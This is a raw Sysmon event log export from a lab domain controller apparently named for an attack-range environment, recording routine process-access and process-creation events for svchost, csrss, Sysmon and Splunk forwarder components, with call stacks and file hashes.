15:55:11.835{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006628Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006627Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006626Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006625Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006624Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7D5F-5FA1-7001-000000008801}3036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006623Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D5F-5FA1-7001-000000008801}3036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006622Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7D5F-5FA1-7001-000000008801}3036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006621Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D5F-5FA1-6F01-000000008801}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006620Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006619Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006618Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006617Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006616Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006615Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006614Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006613Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006612Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006611Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7D5F-5FA1-6F01-000000008801}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006610Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D5F-5FA1-6F01-000000008801}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006609Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.163{D28789B6-7D5F-5FA1-6F01-000000008801}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006648Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.522{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D60-5FA1-7101-000000008801}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006647Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.522{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006646Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.522{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006645Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.522{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006644Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:12.522{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006643Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 